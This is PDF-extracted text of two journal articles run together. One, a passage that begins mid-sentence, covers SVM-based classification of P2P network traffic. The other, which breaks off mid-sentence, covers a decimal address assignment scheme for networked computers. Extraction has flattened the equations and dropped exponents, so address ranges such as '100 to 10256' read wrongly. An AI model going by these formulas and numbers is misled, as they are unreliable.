greatly reduced, the normal operation of the network is affected, and huge economic losses are incurred. Therefore, how to identify and classify the network traffic in real time helps the Internet service provider to understand the network operation status and optimize the network operation and management. It is of great significance. The current popular network traffic identification technologies include traffic identification algorithms based on known ports [2]; traffic identification based on Deep Packet (DPI) [3-5]; traffic identification algorithms based on data flow behavior pattern [6]; traffic identification algorithms based on machine learning and so on. The traffic classification method [7] has been widely proposed in the past few years. Initially, the type of data transmitted over the Internet is relatively small. The traffic identification technology is mainly based on port identification. That is, the general network protocol port number [8] is used to roughly classify traffic. For example, the protocol uses a fixed port. However, with the development of the Internet, merely relying on port identification technology has been insufficient to distinguish between more and more network applications and protocols. In 2004, an application layer load signature recognition method, the DPI technology [9], was proposed to extract the data message samples and determine whether the traffic belongs to the application by matching the signature of the unknown traffic. In recent years, the proportion of network traffic transmitted by encrypted text is increasing. DPI International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 54 technology has been powerless for this part of the traffic. At present, the method of network traffic recognition based on machine learning [9] shows a higher accuracy. Machine learning is an important tool for the study of network traffic identification. Dong S and others described the current popular machine learning method [10]. After comparing and evaluating the clustering algorithm [11], it was found that the feature selection algorithm [12] was better for supervised machine learning[13,14]. DBSCAN algorithm [15] of unsupervised clustering algorithm has higher precision. Since the development of a complete classification architecture [16] for real-time work on high-capacity links is limited, Este A[18] and others after demonstrating the computational time and the optimization steps required to handle different traffic traces, used machine learning techniques(SVM model[17]) to improve system performance and enable real-time traffic identification for high-speed networks. Zhao X proposed a P2P network traffic classification method based on support vector machine [19], using a statistical principle to divide the network traffic of four different types of P2P traffic applications (file sharing BitTorrent, media streaming PPLive, Internet phone Skype, instant messaging MSN), and studied network traffic statistics and SVM methods. The overall framework of P2P traffic classification based on SVM was introduced, how to obtain traffic samples and processing methods were described, and the traffic classifier was constructed, with an average accuracy of 92.38%. Bernaille L and others divided the traffic classification mechanism into two phases [20]: offline learning and online classification. The offline learning stage uses the kMeans method [21,22,23] to divide the original traffic and give a description of each cluster and its application type; the online learning stage determines the application type of the new traffic according to the learning knowledge. Ye M proposed a new method of identifying P2P traffic through data transmission behavior of P2P applications [24]. The data downloaded from the P2P host finds the shared data of the download stream and the online upload stream, and proposes a content-based partitioning scheme to divide the stream into data blocks. Based on the above viewpoints and taking into account the excellent performance of machine learning and SVM in solving P2P traffic classification problems [25-29], this paper proposes a network traffic two classification method based on SVM. which is used to complete the network flow parameters obtained from the packet header after network traffic collection to classify Internet traffic into a wide range of application categories. In the selection process of feature vectors, it should be suitable for SVM algorithm and try to calculate independently of the protocol and port. Therefore, in this paper, we choose the number of packets, size characteristics, data flow time characteristics, flag bits and other information as a preliminary feature vector, through a plurality of classifier selection methods to obtain the optimized feature set. It is used to implement the initial identification of normal traffic in the network, reducing the workload of the feature value matching module, improving the efficiency of the network traffic identification system, and comparing with the method of identifying network traffic that only adopts the feature value matching. The experimental results using the traffic from the campus backbone network show that 99.31% accuracy can be achieved through regular biased training and test samples. When using bias-free training and test samples of the same feature set, an accuracy of 96.12% can be achieved. In addition, since all feature parameters can be calculated from the packet header, the proposed method is also applicable to encrypted network traffic. II. PROPOSED METHOD A. Support Vector Machine (SVM) model SVM is a machine learning method that is based on one of the statistical algorithms with good generalization ability. It is mainly used to solve small samples. The feature vectors of the data stream in the network are more or less, and too many features will affect the efficiency and accuracy of the SVM algorithm. Therefore, to reduce redundant features, feature combinations with high discrimination are selected as feature vectors. After completing the support vector machine International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 55 network traffic classification identification code, statistics and evaluation of the operating efficiency and accuracy of the results are also required. The identification of network traffic is essentially a pattern classification process and is mainly divided into the following three points: 1) Converting the actual problem into the high-dimensional feature space through the kernel function, so that in the high-level space, the hyperplane can be used to classify the data, and the classification decision function is constructed so that the nonlinear problem of the original dimension is converted into linear separable problem. The classification decision function is a linear combination of non-linear functions with support vectors as parameters. The classification function itself is only related to the number of support vectors, so the method of this kind of kernel function is very effective in dealing with the classification problem of high dimensional feature space. 2) Under the condition that the number of known training samples is small, the network traffic classification is converted into secondary optimization and improve the accuracy of classification. The initial threshold is determined by iterating feature subsets using the inter-class distances and intra-class distances of the features. 3) The optimization problem is coded by simulating the natural evolutionary process. The key point of coding is that the code must be able to represent all possible subsets of the feature set. The optimal hyperplane is used to optimize the learning ability of the classifier. This method does not need to rely on the prior probability of the network traffic samples and has better generalization. When using SVM, classifiers with better generalization effects can be achieved by defining different kernel functions and relaxation factors. The optimization model is as follows: Let the training sample set be: {（xi,yi）}，i=1，2， 3，…n; map this sample set to the high-dimensional feature space and achieve regression, the following are obtained: fxωT∅x+b (1) (ω is the weight vector; b is the offset vector) Convert equation (1) to the minimization problem. The objective function of SVM regression is: minω2 +12Ci=1nδi2 s.t. yi-ωTx+b=eii=1,2,3,…n (2) In this formula, C is the penalty parameter; ei is the regression error. Through the Lagrangian operator, the corresponding dual problem is obtained as follows: Lω,b,δ,α=min|ω|2+12 γi=1nδi2+i=1nαi(ωTx-b+ei-yi) (3) Set the kernel function Kxi,xj=(xi)T(xj), then use the nonlinear SVM regression model established by the RBF function. There are: fx=i=1Nαiexp-xi-xj2σ22+b (4) (σ is the width of the core) B. Finding support vectors in training samples Introduce the following rules to distinguish. Set the threshold of the support vector decision function λ=1 or λ=-1, Assume that the decision function in the detection process isfx=sgn{i=1n[aiKxi,x-sidi§]}, f (x)≠1 or f(x)≠－1, The x vector does not belong to the support vector or the x vector belongs to the support vector. An initial support vector library trained from known flows. After the known flow rate is trained by the data acquisition module, the feature extraction module, the data preprocessing module, and the training module, a support vector is generated to perform feature analysis, and its characteristic word information is added to the support vector library. Various known P2P traffic passes through the above process eventually forms a multidimensional support vector group, and a known support vector library is also formed. Finally, the MSVM threshold is determined. If the threshold is equal to 1 (or -1), the detected network traffic is P2P traffic; otherwise, the detected network traffic is non-P2P traffic. When selecting P2P traffic characteristics, the feature extraction should be able to reflect the difference of P2P International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 56 traffic as much as possible. Different nodes in the network have different functions: Some nodes function as servers and provide resource transmission services to other nodes in the network. Some nodes function as clients and receive various services provided by the server. The nodes in the P2P network can serve as servers to other peer nodes, and can also serve as clients to receive services provided by other peer nodes. Therefore, node traffic with different functions and providing different services presents different behavior characteristics. C. Support vector machine network traffic identification process The network traffic identification based on vector machine is essentially making full use of the powerful capability of SVM to deal with non-linear multi-factor system to mine the internal rules and establish the complex non-linear relationship of network traffic change, so as to achieve accurate network traffic prediction. In the learning and classification process of the SVM model, the selection of kernel functions plays a decisive role in the training and classification performance. At present, several frequently studied kernel functions are: linear kernel, RBF(radical basis function) kernel and Gaussian kernel and so on. In this paper, RBF kernel is selected as the kernel function. The overall strategy when selecting the kernel function and adjusting parameters is approximately the following steps: preparing a batch of classified data; splitting the data into two groups: a training group and a test group; using a training group to give a support vector machine for training and learning; The support vector machine predicts the classification of test group data and compares it with the actual classification of the number of test groups, calculates the classification accuracy, replaces the parameters, and then iterates again. If we do not use the cross comparison idea, it is very easy to cause the prediction result to be very good only in the case of a specific input. In other cases, the prediction of the parameter is not stable. D. P2P traffic classification model based on SVM Figure 1 shows the classification framework based on SVM in this paper. This paper firstly extracts and analyzes the traffic to extract several main characteristics of network traffic that are suitable for recognition in the support vector machine. Then, the data is preprocessed, and the known data set for the target problem is set as a training data set, and use an iterative process to train a classification model. The parameters of the model are continuously adjusted by a method of random optimization or analysis, so that it is closest to the actual situation of the training data set. After the model is trained, it can be used to identify unknown samples and dynamically adjust the training sample data by continuously searching for useful training samples to realize the entire network traffic identification based on SVM. Figure 1. Classification framework based on SVM Theoretical model 1) Collector: Using port mirroring method to collect data from routers and collect data as raw data and preprocess them. Multiple harvesters can be connected in parallel or in series. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 57 2) Analyzer: The raw data preprocessed by the collector is subjected to a data feature extraction module to extract the characteristic function parameters. Stored in data warehouse. An analyzer can analyze the data of multiple collectors. After the data is preprocessed, the grid search method can be used to verify the optimal parameters of the RBF kernel function for the training data set. So that the analyzer can accurately predict unknown data. 3) After the optimal parameters are determined, the training data set can be trained to obtain the support vector machine model. The extracted parameter data is taken as the feature value of the original data, and the continuous features and discrete features existing in the data are converted, and these heterogeneous data sets are translated into machine-readable values by the data preprocessing module. 4) Multidimensional support vectors are generated by the data after SVM training. At the same time, the multidimensional support vectors are formed through the process of different P2P traffic data, and one support vector library is formed. 5) Known P2P traffic can get specific P2P type through SVM library. Unknown P2P traffic will be subjected to data preprocessing and SVM training by the data acquisition device and analyzer extraction feature extraction module, and the extracted feature information will be added to the SVM support vector library. After obtaining the specific name of the traffic, it is put into the SVM support vector library and finally identifies the specific P2P traffic. The initial SVM support vector library is a vector library that is trained by known traffic. When the known traffic is subjected to initial data acquisition and feature extraction, data preprocessing, and SVM training, multidimensional support vectors are generated, multidimensional support vectors are characterized, and their characteristic information is added to the SVM support vector library. Known traffic can also form a multidimensional support vector group through the above process. III. EXPERIMENTS A. Traffic data collection Select a network server outlet network traffic to carry on the simulation experiment, take 10ms as the sampling time, select the total number of data packets, uplink traffic ratio, average length, TCP traffic ratio and the ratio of the number of connections and different IP number five traffic characteristics as input data feature information, set up the data set as a training sample set and separate and collate, and preprocess the collected data and normalize it. The collected data samples are shown in Table 1. TABLE I. COLLECTED DATA SAMPLES DataSet Time (ms) Total flow DataSetA 1hour 2300 DataSetB 1 hour 3020 DataSetC 1 hour 1831 DataSetD 1 hour 2290 DataSetE 1 day 9538 Among them, the first four sets of data are used as input data for the training module. DataSetE is used as the data set to be tested. Three support vector machines are constructed here, namely SVM1, SVM2, and SVM3. After training the classifiers SVM1, SVM2, and SVM3, DataSetE was used as the test sample data set, and experimental results were obtained through the SVM classifier. B. Finding optimal parameters The algorithm based on the cross-validation idea is used to select an optimal parameter value C for the RBF kernel function and optimal parameters C and R for the training data set. The labels of the two categories are -1 and 1, which are iterated 51 times. The trained model is saved in the data.Model file. The following information can be obtained from this file: The svm type used for training is c_svm, the kernel function is the radial basis function RBF, the R value is 0.5, the total number of support vectors is 43, and the value of the decision function constant term B is 0.421. Each type of support vector is 22, 20, 21. After the training is completed, the model can be used for SVM type prediction. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 58 Read the file to be predicted, the model file, and then call the function prediction and output the result to a file. 1) After cross test the data, the prediction accuracy is 99.31%. 2) When choose the best parameters (C, R), If the cross validation method of grid search is not adopted, the result of cross validation is not adopted with the default value of 1. According to the method described above, the prediction accuracy is 93.31% obtained by predicting the unknown data through the obtained model. It can be seen that the choice of optimal parameters (C, R) can improve the prediction accuracy of the results. 3) Repeated training and learning. In order to reflect the learning process of SVM, a total of 10 experiments were conducted, by continuously capturing data, the captured data are preprocessed, trained, and predicted. With continuous learning, the accuracy of predictions continues to increase, reaching 91.12%, 93.42%, 94.67%, 95.34%, 95.56%, 96.78%, 97.12%, 97.23%, 97.31% and 97.65% respectively. It can be seen that multiple learning is conducive to classification judgment. However, the learning process also needs to be controlled. Excessive learning will bring negative effects on classification. IV. DISCUSSION The model obtained after training can be used for SVM traffic identification. Various P2P traffic and accuracy are identified from packet capture, preprocessing, recognition, learning and training, and compared with the recognition accuracy based on the Bayesian traffic identification model, the recognition method of the SVM has obtained higher accuracy than the original traffic recognition method in practical application.Figure 2 shows the comparison of different traffic models. Figure 2. Comparison of different models From Figure 2, we can see that for the four kinds of P2P traffic in this experiment, the classification and recognition rate of this classifier is all above 90%, so the effect of this MC-SVM classifier on application layer classification of P2P traffic is very good. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 59 Figure 3. Comparison of stability between Bayesian and SVM Figure 3 is by using a P2P traffic recognition model based on Bayesian and SVM. With the increase of training data sets, the average classification accuracy can still maintain a certain stability, and the accuracy of recognition reaches 97. 8%. It can be seen that the recognition method of SVM has higher accuracy than the original traffic recognition method in practical application. V. CONCLUSIONS SVM algorithm is suitable for nonlinear time series modeling and prediction, so it can well identify the trend of network traffic changes. This paper conducts empirical experiments on the actual data of network traffic. The results show that, compared with the commonly used prediction methods, the recognition model based on SVM can solve the traffic identification. At the same time, it can identify the unknown and large traffic P2P types, and has good effect on the identification of encrypted P2P traffic, and has higher prediction accuracy and better adaptability. ACKNOWLEDGEMENTS Fund support: National natural science foundation, ResearchonSub-NyquistSamplingofshortpulsesbasedXampli ngunderGaborFrames, [61501493]; Shaanxi Education Department Special Fund, Projectnumber: Shaanxi Education Finance[2013] 23. REFERENCES [1] Schulze H, Mochalski K. Internet study 2007[J]. Ipoque Gmbh, 2007. [2] Madhukar A, Williamson C. A Longitudinal Study of P2P Traffic Classification[C]// IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems. IEEE, 2006:179-188. [3] Ma J, Levchenko K, Kreibich C, et al. Unexpected means of protocol inference[C]// ACM SIGCOMM Conference on Internet Measurement. ACM, 2006:313-326. [4] Moore A W, Papagiannaki K. Toward the accurate identification of network applications[C]// International Conference on Passive and Active Network Measurement. Springer-Verlag, 2005:41-54. [5] Haffner P, Sen S, Spatscheck O, et al. ACAS: automated construction of application signatures[C]// ACM SIGCOMM Workshop on Mining Network Data. ACM, 2005:197-202. [6] Huang K, Zhang Q, Zhou C, et al. An Efficient Intrusion Detection Approach for Visual Sensor Networks Based on Traffic Pattern Learning[J]. IEEE Transactions on Systems Man & Cybernetics Systems, 2017, PP(99):1-10. [7] Yuan R, Li Z, Guan X, et al. An SVM-based machine learning method for accurate internet traffic classification[J]. Information Systems Frontiers, 2010, 12(2):149-156. [8] I ANA．Internet assigned numbers authority[EB／OL]．http： //www.iana.org/assigu mens/port-numbers． [9] Spatscheck O, Sen S, Wang D. Method and apparatus for automatically constructing application signatures: US, US 7620807 B1[P]. 2009. [10] Yang C S, Liao M Y, Luo M Y, et al. A Network Management System Based on DPI[C]// International Conference on Network-Based Information Systems. IEEE Computer Society, 2010:385-388. [11] Hartigan J A, Wong M A. Algorithm AS 136: A K-Means Clustering Algorithm[J]. Journal of the Royal Statistical Society, 1979, 28(1):100-108. [12] Liu H, Yu L. Yu, L.: Toward Integrating Feature Selection Algorithm for Classification and Clustering. IEEE Transaction on Knowledge and Data Engineering 17(4), 491-502[J]. IEEE Transactions on Knowledge & Data Engineering, 2005, 17(4):491-502. [13] Pedro S D S. Collective intelligence as a source for machine learning self-supervision[C]// International Workshop on Web Intelligence & Communities. ACM, 2012:5. Classification accuracy(%) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 60 [14] Chapelle O. Semi-supervised Learning (Adaptive Computation and Machine Learning)[J]. Mit Pr, 2006. [15] Liu S, Dou Z T, Li F, et al. A new ant colony clustering algorithm based on DBSCAN[C]// International Conference on Machine Learning and Cybernetics. IEEE, 2004:1491-1496 vol.3. [16] Este A, Gringoli F, Salgarelli L. On-line SVM traffic classification[C]// Wireless Communications and Mobile Computing Conference. IEEE, 2011:1778-1783. [17] Osuna E, Freund R, Girosi F. Training svm: An application to face detection[C]// 1997. [18] Este A, Gringoli F, Salgarelli L. On-line SVM traffic classification[C]// Wireless Communications and Mobile Computing Conference. IEEE, 2011:1778-1783. [19] Zhou X. A P2P Traffic Classification Method Based on SVM[C]// International Symposium on Computer Science and Computational Technology. IEEE Computer Society, 2008:53-57. [20] Bernaille L, Teixeira R, Akodkenou I, et al. Traffic classification on the fly[J]. Acm Sigcomm Computer Communication Review, 2006, 36(2):23-26. [21] JinHuaXu, HongLiu. Web User Clustering Analysis based on KMeans Algorithm[C]// 2010 international conference on information,networking and automation. 2010:V2-6-V2-9. [22] Poornalatha G, Raghavendra P S. Web User Session Clustering Using Modified K-Means Algorithm[M]// Advances in Computing and Communications. Springer Berlin Heidelberg, 2011:243-252. [23] Wang T Z. The Development of Web Log Mining Based on Improve-K-Means Clustering Analysis[M]// Advances in Computer Science and Information Engineering. Springer Berlin Heidelberg, 2012:613-618. [24] Ye M, Wu J, Xu K, et al. Identify P2P Traffic by Inspecting Data Transfer Behaviour[J]. Computer Communications, 2010, 33(10):1141-1150. [25] Tapaswi S, Gupta A S. Flow-Based P2P Network Traffic Classification Using Machine Learning[C]// International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery. IEEE, 2013:402-406. [26] Deng H, Yang A M. P2P traffic classification method based on SVM[J]. Computer Engineering & Applications, 2006. [27] Yang A M, Jiang S Y, Deng H. A P2P Network Traffic Classification Method Using SVM[C]// Young Computer Scientists, 2008. Icycs 2008. the, International Conference for. IEEE, 2008:398-403. [28] Jiang W, Wang C Z, Luo H F, et al. Research on a Method of P2P Traffic Detection Based on SVM[J]. Journal of Hubei University of Technology, 2010. [29] Zhu A. A P2P Network Traffic Classification Method Based on C4.5 Decision Tree Algorithm[M]// Proceedings of the 9th International Symposium on Linear Drives for Industry Applications, Volume 4. Springer Berlin Heidelberg, 2014:373-379. work_65iu2434afccfidjkt4v6det2m ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 53 A Full Decimal Method of Address Assignment for Networked Computer Zhan Xin Department of Information Technology Xi’an Medical University Xi’an, China e-mail: 282981652@qq.com Xie Jianping 1. Chinese Decimal Network Working Group 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13386036170@189.cn Jin Liming 1. Chinese Decimal Network Working Group 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: jlm1978@163.com Lai Jiawen 1. Chinese Decimal Network Working Group 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13918335279@163.com Abstract—The full decimal method of address assignment for networked computers and intelligent terminals which input into the computer through various input devices of the computer and intelligent terminals is realized, and then, the external address of networked computer and intelligent media stored in the database and the internal arithmetic address are created correspondingly through a variety of transmission media by combination of different computer hardware and software. The new address assignment method can provide sufficient address space for development of Internet in the future, and it also provides enough address for application of various personal information household appliances and logistics in electronic commerce and other entities and personal communication terminals while ensuring multiple levels of address structure. This paper mainly introduces the decimal address allocation algorithm and address format, which provides a solid foundation for the next generation Internet architecture design. Keyword-Decimal; Future Network; IPV9; Address Assignment I. INTRODUCTION With the rapid development of science and technology, the world has entered an information age of data communication. The most famous data network is the Internet, which can be seen all over the world. In 1969, in order to develop a computer network capable of resisting nuclear attacks, the US Department of Defense funded the establishment of a packet-switched network named ARPANET, which was the earliest prototype of today's Internet and was regarded as the forerunner of the information superhighway. Nowadays, almost all the countries and regions have joined the Internet. China has also established a number of international exports connected to the world's largest Internet and achieved rapid increase in user terminals. Every single computer connected to the Internet shall be provided with one and unique address so that the information can be correctly transmitted to the destination through the Internet. At the present, there are three methods for address preparation in and out of DOI: 10.21307/ijanmc-2019-034 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 54 China: first, the “IP address”, which is composed of four segment of numbers separated by decimal points; second, the “domain name”, which is generally composed of five character strings (subdomains); and third, the “Chinese domain system”, which is composed of three levels of domain names separated by decimal points and slashes. Although the above address system guarantees each computer a unique address, it is with the unfavorable disadvantages of complex and not uniform, and is difficult to remember and input. At present, the addressing scheme used in the Internet is still based on the original IPv4 protocol, which uses four segments of 8-bit decimal numerals to allocate the addresses of hosts and other devices connected to the Internet. In the meantime, the addresses are marked by the method of “dotted decimal notation”. Although those addresses seem to meet the needs of the entire world in the early stage of Internet development and IPv4 made incredible success, in the last two decades in the 20th century, Internet ushered rapid development all over the world and the number of hosts connected to the Internet have been doubled every year, therefore, current amount of addresses can no longer meet such development momentum. What’s more, addresses have been more and more extensively applied in logistics code in e-commerce, space code, identity code, digital currency and three-dimensional geographical code and other intelligent terminals, the existing address assignment techniques fail to meet the needs of social development. It is of vital significance to develop an address identification method that can meet activities of human for several years. II. DECIMAL ADDRESS ASSIGNMENT ALGORITHM The algorithm in this study can provide a new address assignment method that offers sufficient address space for development of Internet in the future, and provides enough address for application of various personal information household appliances and logistics in electronic commerce and other personal communication terminals in a simpler, more convenient way under a lower cost while ensuring multiple levels of the address structure. The method by which address assignment of a networked computer by full-digital codes is with the following characteristics: the foresaid network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations; the foresaid telephone number consists of international direct distance dialing codes of the country of the telephone user, area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number; the classification number is the numeric number preceded by the country or the area for unified classified business categories. The technical scheme is: a full decimal method of address assignment for networked computers and intelligent terminals that is characterized with, address inputting into the computer through input devices of networked computers and intelligent terminals, such as keyboard, bar code, two-dimensional code input device, visual input device and voice input device, and corresponding preparation of external address of networked computer and intelligent media stored in the database and the internal arithmetic address by combination of various computer hardware and software via a variety of transmission media. The address assignment is conducted by the following steps: 1) External addresses of all networked computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers from 100 to 10256, address are input into the computers via input ports of networked computers and intelligent terminals such as keyboard, voice input device etc.; 2) Internal address of all networked computers and intelligent terminals are localized at binary numbers International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 55 with the representing range of all decimal numbers from 20 to 21024; 3) The addresses can either be corresponded to the binary internal addresses either by the method through which address is with fixed length but variable location or address is with fixed location but variable length; 4) In addition to the external addresses, the above mentioned database also stores the original domain names applied in the form of numbers, English and Chinese and other different languages, as well as communication numbers such as the existing telephone numbers, area numbers, city numbers, mobile phone numbers, MAC address, and the latest digital domain names based on decimal coding; 5) The address in the database is directly corresponding to the binary internal address of the computer, and data flow is pointed to the host via computer hardware and software, for instance, the gateway through optical cable through microwave and coaxial cable and other transmission media; the decimal address for character domain name can be found after being resolved through a domain name resolver and pointed to the address of the host, the telephone number; by pointing to the gateway, the mobile phone number and other communication numbers are directly indicated in the communication system to which the communication number is belong. III. ADDRESS FORMAT AND ALGORITHM In all the address assignment methods for networked computers and other intelligent terminals mentioned above, the entire external addresses is evenly divided into 4 domains, 8 domains, 16 domains or 256 domains and each domain address is with the numerical range of the decimal integers from 100 to 1064, 100 to 1032, 100 to 1016 or 100 to 101. In a corresponding way, the internal address is also evenly divided into 4 domains, 8 domains, 16 domains or 256 domains and each domain address is with the numerical range of the binary numbers from 20 to 2256, 20 to 2128 , 20 to 264 or 20 to 24. Each domain address must be separated from each other by a separator. If there is a contiguous all-zero domain within the foresaid address or the internal address, a pair of braces or square brackets can be used to replace the all-zero domain. If there are more than one contiguous all-zero domain in the address or internal binary address, each contiguous all-0 domain may be replaced by a pair of braces or square brackets, and a Arabic numeral are used to mark the specific amount of all-zero domains in the segment of domain within the brackets. When there is a continuous segment of Arabic numerals found in the foresaid address or one domain of the internal binary address, the segment of Arabic numerals can be replaced by a pair of round brackets and the omitted numerals, the amount of connectors and omissions shall be clearly marked from the left to the right within the round brackets. In addition, an external address is an address with a multilevel structure, which can be the interface of a single network, namely a unicast address. The unicast address structure is with the following three levels. 1) Public topology layer: a collection of network providers and network switching equipment for public Internet switching service. The public topology layer consists of a address prefix, top-level aggregation identifier, reserved domain, and second-level aggregation identifier. 2) Station topology layer: a specific local station or organization that not provides public Internet switching service outside the station. It is composed of a station-level aggregation identifier. 3) Network interface identifier: it is a network interface used for identifying the link. Besides, the foresaid second-level aggregation identifier can be further divided into internal multilevel hierarchical International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 56 structures and the foresaid station-level aggregation identifier can be used to establish its internal addressing structure and identification sub-network, the foresaid network interface identifier can be used in several interfaces at the same node. In many cases, communication between network nodes is limited to a relatively independent region; there is no need for global aggregation of unicast address. But it is necessary to provide a address specially used for local communication, namely, local unicast address, which can be applied in communication between nodes at the same link and generating the unicast address of the local link with the structure of address format prefix and network interface identifier and a zero in the middle. The local unicast address can also be applied in addressing of the communication Internet interface within the range of the station and generating the unicast address in station with the structure of a format prefix, sub-network identifier and network interface identifier, together with a 0 between the format prefix and sub-network identifier. The address coding method in this study also defines some addresses for special purposes. For example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. In addition, some addresses can be assigned to more than one network interfaces at the same time, and generate a cluster address with the same structure of that of the unicast address. The address can also be assigned to a multicast address, and the address message with the destination of a multicast address would be received simultaneously by all the network interfaces provided with the multicast address. The technical scheme adopting the above address assignment method provides sufficient address space for the development of the Internet in the future, realizes simpler address representation, convenient use and more standardized address assignment. Meanwhile, the technical scheme has given full consideration to the size of routing table of the existing router and the current computing power of the computer. The way to Internet access with the address prepared by the above coding method is characterized with: successful access to Email or the Internet realized after inputting the address into the computer modem via a push-button dialing telephone or the computer keyboard and linking into corresponding digital code, which is translated into a IP address or Chinese domain name system, all full-digital coded address is corresponding to an existing IP address or Chinese domain name system. IV. ASSIGNMENT EXAMPLES The specific address assignment algorithm is fully explained by the following examples: A. Example I Through this algorithm, external address of networked computers and intelligent media stored in the database and the internal arithmetic address are created correspondingly. We can evenly divide the entire external address into 8 domains with each address of a decimal integer from 100-1032 and square brackets are used to separate all the 8 domains. Thus, the address is in the format of Y]Y]Y]Y]Y]Y]Y]Y], in which, every Y represents a domain address in the form of a 32-bit decimal number. The entire internal address is also divided into 8 domains with each address of a binary number from 20-212 in the format of X]X]X]X]X]X]X]X], in which, every X represents a domain address in the form of a 128-bit binary number. For instance: 00000000033389732222778830378303]000000000 00000000000000000000000]00000000000000000000 000000000000]0000000000000000000000000000000 0]00000000000000000000000000000000]0000000000 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 57 9875679484593909387401]000000000089746538392 0958 In this address, the multiple continuous zeros at the left part of each decimal number can be omitted but the all-zero decimal numbers shall be represented at least by a zero. Thus, the above address can be written as: 33389732222778830378303]0]0]0]0]98756794845 93909387401]989989021893]897465383920958 For further simplifying the address presentation, the continuous zeros in the address can be replaced by a pair of “[ ]”. For instance, the above address can be further simplified as: 33389732222778830378303[ ]98756794845939093 87401]989989021893]897465383920958 For another instance: 0] 0] 0] 0] 0] 0] 0] 1 can be abbreviated as [ ] 1or[ 7 ] 1 0] 0] 0] 0] 0] 0] 0] 0 can be abbreviated as [ ] or [8] It should be noted that in abbreviation of the above addresses, you can only use "[]" once to represent a contiguous all-zero field, because multiple uses of [] can result in ambiguous addresses. For instance, address 0] 0] 0]12345678]987654]0]0]0 can be abbreviated as: [3]12345678] 987654][ ]or[3]12345678]987654][3], also 0] 0] 0]12345678] 987654][3]. but not [ ]12345678]987654][ ], otherwise, the number of all-zero fields of the left and right part of the address may be confusing during restoration of the address and then result in ambiguous addresses. Besides, for the purpose of further simplification of the address, if there is a continuous sequence of the same Arabic numeral in a address domain, such sequence can be replaced by a pair of round brackets, and the omitted numerals, the number of separators and omissions shall be clearly marked from the left to the right in the brackets. For instance: 0]0]12345678000000000]987654000000]98009800 00]0]0]0] can be abbreviated as [ ]12345678(0/9)]987654(0/6)]980098(0/4) [3] In the process of address preparation of networked computers and intelligent terminals, the external address must be corresponding with the internal binary address. For such purpose, the method by which address with fixed length and variable location is adopted to make the two corresponding with each other in this example. For instance, the external address [ 7 ]19 will be corresponding to the internal binary address [ 7 ](0/251) 10011, and the address [ 7 ]21 will be corresponding to [ 7 ](0/251)10101. The address prepared by the method mentioned above can be assigned to network interfaces, and if assigned to single network interface, the identifier is then regarded as a unicast address, and message with the destination of a unicast address will be delivered to the only network interface identified by itself. Unicast address is with the same good flexibility as that of the multilevel network structure, which is good for solving the difficult problem of router addressing. For instance, a w aggregation global unicast address is provided with three layers, namely the public topology layer, station topology layer and network interface identifier, in which, the public topology layer is consisted of a address prefix (FP), top-level aggregation level(FLA), reserved domain (RES) and second-level aggregation identifier (NLA), the station topology layer is consisted of station-level aggregation identifier, and the foresaid network interface identifier is merely consisted of network interface identifier. The specific structure is as shown in Table 1 in the following: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 58 TABLE I. STRUCTURAL TABLE OF GLOBAL UNICAST ADDRESS FP(4bits) TLA Identifier (26 bits) RES(18bits) NLA Identifier （48 bits） SLA Identifier (32 bits) Network Interface Identifier (128 bits) Public topology layer Station-level topology layer Network interface identifier For instance, the FP of an address is 1001, TLA identifier is 8960, RES is 9806, NLA identifier is 9999999, SLA identifier is 8887, and the network interface identifier is 0, then, the entire address is identified by 1001(0/24)8960](0/4) 9806(0/14)] (0/25)9999999](0/28)8887][4]. In such address, by the format prefix routing system, it is easy to tell whether the address is a unicast or other type of address. The top-level aggregation identifier is the highest level at the routing hierarchy, and in case of missing of a router, every top-level aggregation identifier shall be provided with a corresponding item in the routing table together with the routing information of provided with top-level aggregation identifiers shall employ second-level aggregation identifiers in establishment of addressing hierarchical structure and identification of internal stations in the process of internal addressing. And any organization is free to select the assignment plan according to their own needs in allocation of their second-level aggregation identifiers so as to establish their own internal addressing hierarchy. Establishment of a hierarchical structure is conducive to aggregation of routers at all levels to be greater extent, and realization of a smaller size of the routing table. A structure can be established as shown in Table 2. TABLE II. HIERARCHICAL STRUCTURE N L A1 Station Identifier Station-level aggregation identifiers are used for recognition of establishment of internal addressing hierarchical structure and identification of sub-network number by some organizations (stations). The structure can be shown in Table 3 in the following. TABLE III. STRUCTURE OF STATION-LEVEL AGGREGATION IDENTIFIERS S L A1 Sub-network number In which, the amount of the hierarchies in the station-level aggregation identifier field and the length of SLA identifier at all levels shall be decided by the organizations themselves according to the topology layer structure of their internal sub-network. For a global unicast address prepared and assigned by the above method; address preparation of a station itself is relatively independent of that of the Internet. If a station needs to be readdressed, among all the addresses within the station, only the two parts, namely the top-level aggregation identifiers and second-level aggregation identifiers (public topology layer) need certain modifications and the station-level aggregation identifiers and network interface identifiers can remain the same. With such assignment approach, great convenience is brought to management and allocation of Internet network addresses. B. Example II In this example, unified address assignment for various computers and intelligent terminals are basically conducted by the same steps as in Example I, but corresponding preparation of external address and internal address can be conducted by way of address with fixed location and variable length. By this method, a variety of external addresses of all computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 59 between 100 and 